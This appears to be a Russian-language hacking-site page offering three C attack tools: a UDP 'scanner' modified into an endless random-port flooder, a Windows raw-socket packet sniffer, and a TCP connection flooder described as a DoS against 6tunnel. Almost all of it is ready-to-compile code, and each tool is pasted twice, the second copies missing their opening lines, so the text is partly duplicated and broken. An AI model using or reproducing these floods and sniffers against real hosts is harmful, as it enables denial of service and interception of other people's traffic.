Язык: С
ОС:
Компилировать:
gcc -o cw cw.c -lpthread
lgcc -o cw cw.c -lpthread
Автор: Legion2000 Security Research 1996 - 2002
Исходник
#include <errno.h>
#include <netdb.h>
#include <pthread.h>
#include <stdio.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/types.h>
void usage (char *program);
void *scanport (void *arg);
char *elapsed (struct timeval first, struct timeval second);
struct sockaddr_in s_in;
FILE *out;
pthread_mutex_t varlock = PTHREAD_MUTEX_INITIALIZER;
pthread_t threadid;
int numthreads = 0, done = 0, ready = 0;
u_short lower, upper;
#define MAXTHREADS 256 /* The maximum number of concurrent threads available */
#define TIMEOUT 0
#define NUMRETRIES 100 /* Number of times to retry when no error or datagram
is received in reply */
void
usage (char *program)
{
fprintf (stderr,
"Invalid usage; please try: ./cw <desthost>\n");
exit (-1);
}
/* Our scanning method really kinda sucks, but its the best we can do,
* due to various limitations in the protocol itself. If a host or
* its routers return no data for a particular port, the best we can
* do is assume that the port is open. If neither a UDP datagram nor
* an ICMP error message is returned, we must declare the port open.
* This is because some UDP ports dont respond to malformed packets.
* If we receive a UDP datagram back, obviously the port is listening.
* Last but not least, if the port is in fact closed, and the host is
* responsive, the recv() will fail, yielding an errno of ECONNRESET,
* corresponding to an ICMP port unreachable message. As we see, some
* UDP services such as daytime will send a packet upon receipt of ANY
* datagram, but other services such as BIND will only respond to a
* legitimate DNS packet, thus effectively always timing out.
* As we all know, UDP is an unreliable protocol, so two probes will
* be sent to a port that times out, just to ensure that the packet
* was not dropped, misrouted, or lost in transit.
* NOTE: If you scan your localhost there might be a misleading
* collision caused by a packet that is sent to one of the very same
* UDP sockets that you are scanning from */
void *
scanport (void *arg)
{
struct sockaddr_in mys_in = s_in;
struct servent *se;
struct timeval tv;
fd_set readfd;
u_short port;
char data[1], *alphaport;
int error, udpsocket, counter, open;
pthread_mutex_lock (&varlock);
numthreads++;
pthread_mutex_unlock (&varlock);
if ((udpsocket = socket (PF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1)
return;
pthread_detach (pthread_self ());
port = (u_short) arg;
mys_in.sin_port = htons (port);
if (connect (udpsocket, (struct sockaddr *) &mys_in, sizeof (
struct sockaddr_in)) == 0)
{
for (counter = 0; counter < NUMRETRIES; counter++)
{
FD_ZERO (&readfd);
FD_SET (udpsocket, &readfd);
tv.tv_sec = TIMEOUT;
tv.tv_usec = 0;
send (udpsocket, data, 0, 0);
error = select ((udpsocket + 1), &readfd, NULL, NULL, &tv);
switch(error)
{
case (-1):
fprintf (stderr, "Select() failed; exiting.\n");
exit (-1);
break;
case 0:
open = 1;
break;
case 1:
open = (recv (udpsocket, data, 0, 0) != -1);
break;
}
if (error != 0)
break;
/* If error was 0, there was no reply; we retry for
a variable number of times */
}
if (open)
{
/* It may seem silly to print to a buffer first, but we must
* printf() in one fell swoop to avoid the threads accessing
* stdout concurrently and merging their output. */
// alphaport = (char *) malloc (8);
// if (error == 0)
// snprintf (alphaport, 7, "[%d]", port);
// else
// snprintf (alphaport, 7, "%d", port);
// if ((se = getservbyport (htons (port), "udp")) != NULL)
// fprintf (out, " %s (%s),", alphaport, se->s_name);
// else
// fprintf (out, " %s,", alphaport);
}
}
fflush(out);
close (udpsocket);
pthread_mutex_lock (&varlock);
numthreads--;
if (port == upper)
done = 1;
if ((done) && (!(numthreads)))
ready = 1;
pthread_mutex_unlock (&varlock);
pthread_exit (NULL);
return;
}
int
main (int argc, char *argv[])
{
pthread_t threadid;
struct timeval initial, final;
struct hostent *he;
u_short inc;
if (argc != 2)
usage (argv[0]);
//if ((!(lower = atoi (argv[2]))) || (!(upper = atoi (argv[3]))))
// {
// fprintf (stderr, "Invalid lower or upper port specified! Exiting.\n");
// exit(-1);
// }
if ((he = gethostbyname (argv[1])) == NULL)
{
fprintf (stderr, "Unable to resolve target host! Exiting.\n");
exit (-1);
}
memset (&s_in, 0, sizeof (s_in));
s_in.sin_family = AF_INET;
memcpy (&s_in.sin_addr.s_addr, he->h_addr, he->h_length);
// if (upper < lower)
// {
inc = 65535;//upper;
upper = rand(); //lower;
lower = rand(); //inc;
// }
out = fdopen (fileno (stdout), "w");
fprintf(out, "\nCock whipping host : %s with leet packets ", inet_ntoa (s_in.sin_addr));
fflush (out);
gettimeofday (&initial, NULL);
/* We've prepped everything, now it's time to scan each host in a loop */
while(1)
for (inc = lower - 1; inc<= upper; inc++)
{
// while (numthreads >= MAXTHREADS)
// ; /* A null loop to wait until space is freed */
pthread_create (&threadid, NULL, scanport, (void *) inc);
}
while (!(ready)) { } /* Another null loop to wait for all scanning to get done */
gettimeofday (&final, NULL);
printf ("\nFinished scan for a total of %s seconds.\n",
elapsed (initial, final));
}
char *
elapsed (struct timeval first, struct timeval second)
{
char *length; /* x.yy Seconds.hundredths */
double a, b, diff;
length = (char *) malloc (7);
a = first.tv_sec + ((double) (first.tv_usec) / 1000000);
b = second.tv_sec + ((double) (second.tv_usec) / 1000000);
diff = b - a;
snprintf (length, 6, "%2f", diff);
return (length);
}
#include <netdb.h>
#include <pthread.h>
#include <stdio.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/types.h>
void usage (char *program);
void *scanport (void *arg);
char *elapsed (struct timeval first, struct timeval second);
struct sockaddr_in s_in;
FILE *out;
pthread_mutex_t varlock = PTHREAD_MUTEX_INITIALIZER;
pthread_t threadid;
int numthreads = 0, done = 0, ready = 0;
u_short lower, upper;
#define MAXTHREADS 256 /* The maximum number of concurrent threads available */
#define TIMEOUT 0
#define NUMRETRIES 100 /* Number of times to retry when no error or datagram
is received in reply */
void
usage (char *program)
{
fprintf (stderr,
"Invalid usage; please try: ./cw <desthost>\n");
exit (-1);
}
/* Our scanning method really kinda sucks, but its the best we can do,
* due to various limitations in the protocol itself. If a host or
* its routers return no data for a particular port, the best we can
* do is assume that the port is open. If neither a UDP datagram nor
* an ICMP error message is returned, we must declare the port open.
* This is because some UDP ports dont respond to malformed packets.
* If we receive a UDP datagram back, obviously the port is listening.
* Last but not least, if the port is in fact closed, and the host is
* responsive, the recv() will fail, yielding an errno of ECONNRESET,
* corresponding to an ICMP port unreachable message. As we see, some
* UDP services such as daytime will send a packet upon receipt of ANY
* datagram, but other services such as BIND will only respond to a
* legitimate DNS packet, thus effectively always timing out.
* As we all know, UDP is an unreliable protocol, so two probes will
* be sent to a port that times out, just to ensure that the packet
* was not dropped, misrouted, or lost in transit.
* NOTE: If you scan your localhost there might be a misleading
* collision caused by a packet that is sent to one of the very same
* UDP sockets that you are scanning from */
void *
scanport (void *arg)
{
struct sockaddr_in mys_in = s_in;
struct servent *se;
struct timeval tv;
fd_set readfd;
u_short port;
char data[1], *alphaport;
int error, udpsocket, counter, open;
pthread_mutex_lock (&varlock);
numthreads++;
pthread_mutex_unlock (&varlock);
if ((udpsocket = socket (PF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1)
return;
pthread_detach (pthread_self ());
port = (u_short) arg;
mys_in.sin_port = htons (port);
if (connect (udpsocket, (struct sockaddr *) &mys_in, sizeof (
struct sockaddr_in)) == 0)
{
for (counter = 0; counter < NUMRETRIES; counter++)
{
FD_ZERO (&readfd);
FD_SET (udpsocket, &readfd);
tv.tv_sec = TIMEOUT;
tv.tv_usec = 0;
send (udpsocket, data, 0, 0);
error = select ((udpsocket + 1), &readfd, NULL, NULL, &tv);
switch(error)
{
case (-1):
fprintf (stderr, "Select() failed; exiting.\n");
exit (-1);
break;
case 0:
open = 1;
break;
case 1:
open = (recv (udpsocket, data, 0, 0) != -1);
break;
}
if (error != 0)
break;
/* If error was 0, there was no reply; we retry for
a variable number of times */
}
if (open)
{
/* It may seem silly to print to a buffer first, but we must
* printf() in one fell swoop to avoid the threads accessing
* stdout concurrently and merging their output. */
// alphaport = (char *) malloc (8);
// if (error == 0)
// snprintf (alphaport, 7, "[%d]", port);
// else
// snprintf (alphaport, 7, "%d", port);
// if ((se = getservbyport (htons (port), "udp")) != NULL)
// fprintf (out, " %s (%s),", alphaport, se->s_name);
// else
// fprintf (out, " %s,", alphaport);
}
}
fflush(out);
close (udpsocket);
pthread_mutex_lock (&varlock);
numthreads--;
if (port == upper)
done = 1;
if ((done) && (!(numthreads)))
ready = 1;
pthread_mutex_unlock (&varlock);
pthread_exit (NULL);
return;
}
int
main (int argc, char *argv[])
{
pthread_t threadid;
struct timeval initial, final;
struct hostent *he;
u_short inc;
if (argc != 2)
usage (argv[0]);
//if ((!(lower = atoi (argv[2]))) || (!(upper = atoi (argv[3]))))
// {
// fprintf (stderr, "Invalid lower or upper port specified! Exiting.\n");
// exit(-1);
// }
if ((he = gethostbyname (argv[1])) == NULL)
{
fprintf (stderr, "Unable to resolve target host! Exiting.\n");
exit (-1);
}
memset (&s_in, 0, sizeof (s_in));
s_in.sin_family = AF_INET;
memcpy (&s_in.sin_addr.s_addr, he->h_addr, he->h_length);
// if (upper < lower)
// {
inc = 65535;//upper;
upper = rand(); //lower;
lower = rand(); //inc;
// }
out = fdopen (fileno (stdout), "w");
fprintf(out, "\nCock whipping host : %s with leet packets ", inet_ntoa (s_in.sin_addr));
fflush (out);
gettimeofday (&initial, NULL);
/* We've prepped everything, now it's time to scan each host in a loop */
while(1)
for (inc = lower - 1; inc<= upper; inc++)
{
// while (numthreads >= MAXTHREADS)
// ; /* A null loop to wait until space is freed */
pthread_create (&threadid, NULL, scanport, (void *) inc);
}
while (!(ready)) { } /* Another null loop to wait for all scanning to get done */
gettimeofday (&final, NULL);
printf ("\nFinished scan for a total of %s seconds.\n",
elapsed (initial, final));
}
char *
elapsed (struct timeval first, struct timeval second)
{
char *length; /* x.yy Seconds.hundredths */
double a, b, diff;
length = (char *) malloc (7);
a = first.tv_sec + ((double) (first.tv_usec) / 1000000);
b = second.tv_sec + ((double) (second.tv_usec) / 1000000);
diff = b - a;
snprintf (length, 6, "%2f", diff);
return (length);
}
Тип: Sniffer
Язык: С
ОС: Windows
Автор: rattle
Исходник
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#pragma comment (lib, "ws2_32.lib")
#ifndef SIO_RCVALL
#define SIO_RCVALL 0x98000001
#endif
#ifndef IP_HDRINCL
#define IP_HDRINCL 0x2
#endif
#define IpProtocol_ICMP 1
#define IpProtocol_IGMP 2
#define IpProtocol_TCP 6
#define IpProtocol_UDP 17
typedef struct _IpHeader // IPv4 implementation
{
unsigned char HeaderLength_Version; // combined Header Length and Version field
unsigned char TypeOfService; // The TOS field can simply be 0
unsigned short TotalLength; // Total Length of the datagram.
unsigned short Identification; // Identification of the packet
unsigned short FragmentationFlags; // Fragment position in the datagram
unsigned char TTL; // Time to Live
unsigned char Protocol; // The protocol that follows IP
unsigned short CheckSum; // The checksum
unsigned int sourceIPAddress; // Originating IP Address
unsigned int destIPAddress; // Destination IP Address
} IpHeader, FAR * LPIpHeader;
#define IpHeaderLength sizeof(IpHeader)
#define uint8_t unsigned char
#define uint16_t unsigned short
#define uint32_t unsigned int
#define uint64_t unsigned long long
#define ICMPHeaderLength 20
#define IGMPHeaderLength 8
#define TCPHeaderLength 20
#define UDPHeaderLength 8
typedef unsigned long USLONG;
typedef unsigned long IP;
#define VH_WORD(_h,_i) ((_h >> 2) + (_i << 4))
#define HEADERL(_wrd) ((_wrd - ((_wrd >> 4) << 4)) << 2)
#define VERSION(_wrd) (_wrd >> 4)
int Error(LPCSTR message)
{
WSACleanup();
printf("%s%s\nQuitting, press any key to continue ...",message,"\n\n");
getchar();
return WSAGetLastError();
}
char* DottedDecimal(long lAddr)
{
in_addr addr;
addr.S_un.S_addr=lAddr;
return inet_ntoa(addr);
}
IP GetLocalAddress()
{
HOSTENT* pNormalHostEnt;
char cHostName[0xFF] = {0};
if (gethostname(cHostName,0xFF)==SOCKET_ERROR) return 0;
if (!(pNormalHostEnt = gethostbyname(cHostName))) return 0;
return (((IN_ADDR*)pNormalHostEnt->h_addr_list[0])->S_un.S_addr);
}
int main(int argc, char* argv[])
{
printf("\n");
WSADATA wsa;
OSVERSIONINFO ver;
if (WSAStartup(MAKEWORD(2,2),&wsa) != 0)
return Error("Windows Sockets initialization failed.");
if ((LOBYTE(wsa.wVersion) < 2) || (HIBYTE(wsa.wVersion) < 2))
{
char err[50] = {0};
sprintf(err,"Winsock DLL Version %d.%d found, "
"at least Version 2.2 is required.",
LOBYTE(wsa.wVersion),
HIBYTE(wsa.wVersion)
);
return Error(err);
}
ver.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
if(GetVersionEx((LPOSVERSIONINFO) &ver))
{
if (!((ver.dwPlatformId > 1) && (ver.dwMajorVersion == 5)))
{
return Error("This program only works "
"on Windows 2000, XP and later OS.");
}
}
else
{
return Error("OS Version could not be "
"determined. Quitting.");
}
SOCKET sSockRaw = socket(AF_INET,SOCK_RAW,IPPROTO_IP);
BOOL bIsTrue = TRUE;
USLONG ulBytes;
if (sSockRaw == INVALID_SOCKET)
return Error("Could not create Socket.");
sockaddr_in soSrc;
memset(&soSrc,0,sizeof(soSrc));
soSrc.sin_family = AF_INET;
soSrc.sin_port = htons ( 0 );
soSrc.sin_addr.s_addr = (argc > 1) ?
inet_addr(argv[1]) : GetLocalAddress();
if(setsockopt(sSockRaw,IPPROTO_IP,IP_HDRINCL, (char*)
&bIsTrue, sizeof(bIsTrue)) == SOCKET_ERROR)
{
return Error("Unable to set \"Header Included\""
"flag. Quitting.");
}
if (bind(sSockRaw,(sockaddr*)&soSrc,sizeof(soSrc)))
return Error("Could not bind socket.");
if (WSAIoctl(sSockRaw,SIO_RCVALL,&bIsTrue,sizeof(bIsTrue),
NULL,0,&ulBytes,NULL,NULL))
{
return Error("Unable to start sniffer!");
}
printf("Initialization successful. Press any key to "
"start sniffing, and use [CTRL]-[C] to cancel "
"the program."); getchar();
while (true)
{
char vBuffer[0xBAD] = {0};
sockaddr saConnected;
int iTmp = sizeof(saConnected);
int iResult=recvfrom(sSockRaw,vBuffer,0xBAD,NULL,
&saConnected,&iTmp);
if (iResult!=SOCKET_ERROR)
{
memcpy(&soSrc,&saConnected,sizeof(saConnected));
LPIpHeader iBuffer = (LPIpHeader) malloc(IpHeaderLength);
memcpy((void*) iBuffer, (void*) vBuffer, IpHeaderLength);
int tProtLen = IpHeaderLength;
char sProtocol[0x10] = {0};
switch(iBuffer->Protocol)
{
case IpProtocol_ICMP:
tProtLen = ICMPHeaderLength;
sprintf(sProtocol,"ICMP");
break;
case IpProtocol_IGMP:
tProtLen = ICMPHeaderLength;
sprintf(sProtocol,"ICMP");
break;
case IpProtocol_TCP:
tProtLen = TCPHeaderLength;
sprintf(sProtocol,"TCP");
break;
case IpProtocol_UDP:
tProtLen = UDPHeaderLength;
sprintf(sProtocol,"UDP");
break;
default:
continue;
}
printf
(
"\n%s\t[TTL=%3d] [%s -> %s]",
sProtocol, iBuffer->TTL,
DottedDecimal(iBuffer->sourceIPAddress),
DottedDecimal(iBuffer->destIPAddress)
);
free(iBuffer);
}
else
{
WSAGetLastError();
WSASetLastError(0);
}
}
return 0;
}
#include <stdlib.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#pragma comment (lib, "ws2_32.lib")
#ifndef SIO_RCVALL
#define SIO_RCVALL 0x98000001
#endif
#ifndef IP_HDRINCL
#define IP_HDRINCL 0x2
#endif
#define IpProtocol_ICMP 1
#define IpProtocol_IGMP 2
#define IpProtocol_TCP 6
#define IpProtocol_UDP 17
typedef struct _IpHeader // IPv4 implementation
{
unsigned char HeaderLength_Version; // combined Header Length and Version field
unsigned char TypeOfService; // The TOS field can simply be 0
unsigned short TotalLength; // Total Length of the datagram.
unsigned short Identification; // Identification of the packet
unsigned short FragmentationFlags; // Fragment position in the datagram
unsigned char TTL; // Time to Live
unsigned char Protocol; // The protocol that follows IP
unsigned short CheckSum; // The checksum
unsigned int sourceIPAddress; // Originating IP Address
unsigned int destIPAddress; // Destination IP Address
} IpHeader, FAR * LPIpHeader;
#define IpHeaderLength sizeof(IpHeader)
#define uint8_t unsigned char
#define uint16_t unsigned short
#define uint32_t unsigned int
#define uint64_t unsigned long long
#define ICMPHeaderLength 20
#define IGMPHeaderLength 8
#define TCPHeaderLength 20
#define UDPHeaderLength 8
typedef unsigned long USLONG;
typedef unsigned long IP;
#define VH_WORD(_h,_i) ((_h >> 2) + (_i << 4))
#define HEADERL(_wrd) ((_wrd - ((_wrd >> 4) << 4)) << 2)
#define VERSION(_wrd) (_wrd >> 4)
int Error(LPCSTR message)
{
WSACleanup();
printf("%s%s\nQuitting, press any key to continue ...",message,"\n\n");
getchar();
return WSAGetLastError();
}
char* DottedDecimal(long lAddr)
{
in_addr addr;
addr.S_un.S_addr=lAddr;
return inet_ntoa(addr);
}
IP GetLocalAddress()
{
HOSTENT* pNormalHostEnt;
char cHostName[0xFF] = {0};
if (gethostname(cHostName,0xFF)==SOCKET_ERROR) return 0;
if (!(pNormalHostEnt = gethostbyname(cHostName))) return 0;
return (((IN_ADDR*)pNormalHostEnt->h_addr_list[0])->S_un.S_addr);
}
int main(int argc, char* argv[])
{
printf("\n");
WSADATA wsa;
OSVERSIONINFO ver;
if (WSAStartup(MAKEWORD(2,2),&wsa) != 0)
return Error("Windows Sockets initialization failed.");
if ((LOBYTE(wsa.wVersion) < 2) || (HIBYTE(wsa.wVersion) < 2))
{
char err[50] = {0};
sprintf(err,"Winsock DLL Version %d.%d found, "
"at least Version 2.2 is required.",
LOBYTE(wsa.wVersion),
HIBYTE(wsa.wVersion)
);
return Error(err);
}
ver.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
if(GetVersionEx((LPOSVERSIONINFO) &ver))
{
if (!((ver.dwPlatformId > 1) && (ver.dwMajorVersion == 5)))
{
return Error("This program only works "
"on Windows 2000, XP and later OS.");
}
}
else
{
return Error("OS Version could not be "
"determined. Quitting.");
}
SOCKET sSockRaw = socket(AF_INET,SOCK_RAW,IPPROTO_IP);
BOOL bIsTrue = TRUE;
USLONG ulBytes;
if (sSockRaw == INVALID_SOCKET)
return Error("Could not create Socket.");
sockaddr_in soSrc;
memset(&soSrc,0,sizeof(soSrc));
soSrc.sin_family = AF_INET;
soSrc.sin_port = htons ( 0 );
soSrc.sin_addr.s_addr = (argc > 1) ?
inet_addr(argv[1]) : GetLocalAddress();
if(setsockopt(sSockRaw,IPPROTO_IP,IP_HDRINCL, (char*)
&bIsTrue, sizeof(bIsTrue)) == SOCKET_ERROR)
{
return Error("Unable to set \"Header Included\""
"flag. Quitting.");
}
if (bind(sSockRaw,(sockaddr*)&soSrc,sizeof(soSrc)))
return Error("Could not bind socket.");
if (WSAIoctl(sSockRaw,SIO_RCVALL,&bIsTrue,sizeof(bIsTrue),
NULL,0,&ulBytes,NULL,NULL))
{
return Error("Unable to start sniffer!");
}
printf("Initialization successful. Press any key to "
"start sniffing, and use [CTRL]-[C] to cancel "
"the program."); getchar();
while (true)
{
char vBuffer[0xBAD] = {0};
sockaddr saConnected;
int iTmp = sizeof(saConnected);
int iResult=recvfrom(sSockRaw,vBuffer,0xBAD,NULL,
&saConnected,&iTmp);
if (iResult!=SOCKET_ERROR)
{
memcpy(&soSrc,&saConnected,sizeof(saConnected));
LPIpHeader iBuffer = (LPIpHeader) malloc(IpHeaderLength);
memcpy((void*) iBuffer, (void*) vBuffer, IpHeaderLength);
int tProtLen = IpHeaderLength;
char sProtocol[0x10] = {0};
switch(iBuffer->Protocol)
{
case IpProtocol_ICMP:
tProtLen = ICMPHeaderLength;
sprintf(sProtocol,"ICMP");
break;
case IpProtocol_IGMP:
tProtLen = ICMPHeaderLength;
sprintf(sProtocol,"ICMP");
break;
case IpProtocol_TCP:
tProtLen = TCPHeaderLength;
sprintf(sProtocol,"TCP");
break;
case IpProtocol_UDP:
tProtLen = UDPHeaderLength;
sprintf(sProtocol,"UDP");
break;
default:
continue;
}
printf
(
"\n%s\t[TTL=%3d] [%s -> %s]",
sProtocol, iBuffer->TTL,
DottedDecimal(iBuffer->sourceIPAddress),
DottedDecimal(iBuffer->destIPAddress)
);
free(iBuffer);
}
else
{
WSAGetLastError();
WSASetLastError(0);
}
}
return 0;
}
TCP Flooder
Исходник
/*
* ipv4/ipv6 tcp connection flooder.
* Originally used as a DoS for 6tunnel (versions < 0.08).
* Version 0.08 is a broken version. Please update to 0.09.
*
* Description of options:
* -6 : flood an ipv6 address.
* port : tcp port to flood (default: 667)
* delay: delay between connections (ms).
* times: max number of connections (default: 2500).
*
* awayzzz <awayzzz@digibel.org>
* You can even find me @IRCnet if you need.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define DEFP 667 // default port.
#define DEFT 2500 // default number of connections.
#define TIME 100000 // delay between connections.
// tune it for best performances!
#define HAVE_IPV6
#define VALID_PORT(i) (i<65535 && i > 0)
int main(int argc,char *argv[])
{
int ret, fd, i, ip6 = 0;
int times = DEFT, port = DEFP, delay = TIME;
struct sockaddr_in sin;
#ifdef HAVE_IPV6
struct sockaddr_in6 sin6;
#endif
if( argc < 2 )
{
char *pname;
if(!(pname = strrchr(argv[0],'/')))
pname = argv[0];
else
pname++;
printf("Usage: %s [-6] ip4/6 [port] [delay (ms)] [times]\n", pname);
exit (0);
}
if(!strcmp(argv[1],"-6"))
{
#ifdef HAVE_IPV6
ip6 = 1;
#endif
argv++;
argc--;
}
if(argc > 2)
{
port = strtol(argv[2], NULL, 10);
if(!VALID_PORT(port))
{
fprintf(stderr,"Invalid port number. Using default\n");
port = DEFP;
}
}
if(argc > 3)
delay = strtol(argv[3], NULL, 10);
if(argc > 4)
times = strtol(argv[4], NULL, 10);
printf("Started with %s flood to %s on %d for %d times!\n",
(ip6 == 1) ? "ipv6" : "ipv4", argv[1], port, times);
for (i = 0; i < times; i++)
{
#ifdef HAVE_IPV6
if(ip6)
{
fd = socket(AF_INET6, SOCK_STREAM, 0);
memset(&sin6, 0, sizeof(sin6));
sin6.sin6_family = AF_INET6;
sin6.sin6_port = htons(port);
inet_pton(AF_INET6,argv[1],sin6.sin6_addr.s6_addr);
}
else
{
#endif /* HAVE_IPV6 */
fd = socket(AF_INET, SOCK_STREAM, 0);
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr(argv[1]);
sin.sin_port = htons(port);
#ifdef HAVE_IPV6
}
if(ip6)
ret = connect(fd, (struct sockaddr *)&sin6, sizeof(sin6));
else
#endif
ret = connect(fd, (struct sockaddr *)&sin, sizeof(sin));
if(ret < 0)
{
printf("connect %d failed.\n",i);
perror("connect");
break;
}
printf("Connection no. %d\n",i);
close(fd);
usleep(delay);
}
}
* ipv4/ipv6 tcp connection flooder.
* Originally used as a DoS for 6tunnel (versions < 0.08).
* Version 0.08 is a broken version. Please update to 0.09.
*
* Description of options:
* -6 : flood an ipv6 address.
* port : tcp port to flood (default: 667)
* delay: delay between connections (ms).
* times: max number of connections (default: 2500).
*
* awayzzz <awayzzz@digibel.org>
* You can even find me @IRCnet if you need.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define DEFP 667 // default port.
#define DEFT 2500 // default number of connections.
#define TIME 100000 // delay between connections.
// tune it for best performances!
#define HAVE_IPV6
#define VALID_PORT(i) (i<65535 && i > 0)
int main(int argc,char *argv[])
{
int ret, fd, i, ip6 = 0;
int times = DEFT, port = DEFP, delay = TIME;
struct sockaddr_in sin;
#ifdef HAVE_IPV6
struct sockaddr_in6 sin6;
#endif
if( argc < 2 )
{
char *pname;
if(!(pname = strrchr(argv[0],'/')))
pname = argv[0];
else
pname++;
printf("Usage: %s [-6] ip4/6 [port] [delay (ms)] [times]\n", pname);
exit (0);
}
if(!strcmp(argv[1],"-6"))
{
#ifdef HAVE_IPV6
ip6 = 1;
#endif
argv++;
argc--;
}
if(argc > 2)
{
port = strtol(argv[2], NULL, 10);
if(!VALID_PORT(port))
{
fprintf(stderr,"Invalid port number. Using default\n");
port = DEFP;
}
}
if(argc > 3)
delay = strtol(argv[3], NULL, 10);
if(argc > 4)
times = strtol(argv[4], NULL, 10);
printf("Started with %s flood to %s on %d for %d times!\n",
(ip6 == 1) ? "ipv6" : "ipv4", argv[1], port, times);
for (i = 0; i < times; i++)
{
#ifdef HAVE_IPV6
if(ip6)
{
fd = socket(AF_INET6, SOCK_STREAM, 0);
memset(&sin6, 0, sizeof(sin6));
sin6.sin6_family = AF_INET6;
sin6.sin6_port = htons(port);
inet_pton(AF_INET6,argv[1],sin6.sin6_addr.s6_addr);
}
else
{
#endif /* HAVE_IPV6 */
fd = socket(AF_INET, SOCK_STREAM, 0);
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr(argv[1]);
sin.sin_port = htons(port);
#ifdef HAVE_IPV6
}
if(ip6)
ret = connect(fd, (struct sockaddr *)&sin6, sizeof(sin6));
else
#endif
ret = connect(fd, (struct sockaddr *)&sin, sizeof(sin));
if(ret < 0)
{
printf("connect %d failed.\n",i);
perror("connect");
break;
}
printf("Connection no. %d\n",i);
close(fd);
usleep(delay);
}
}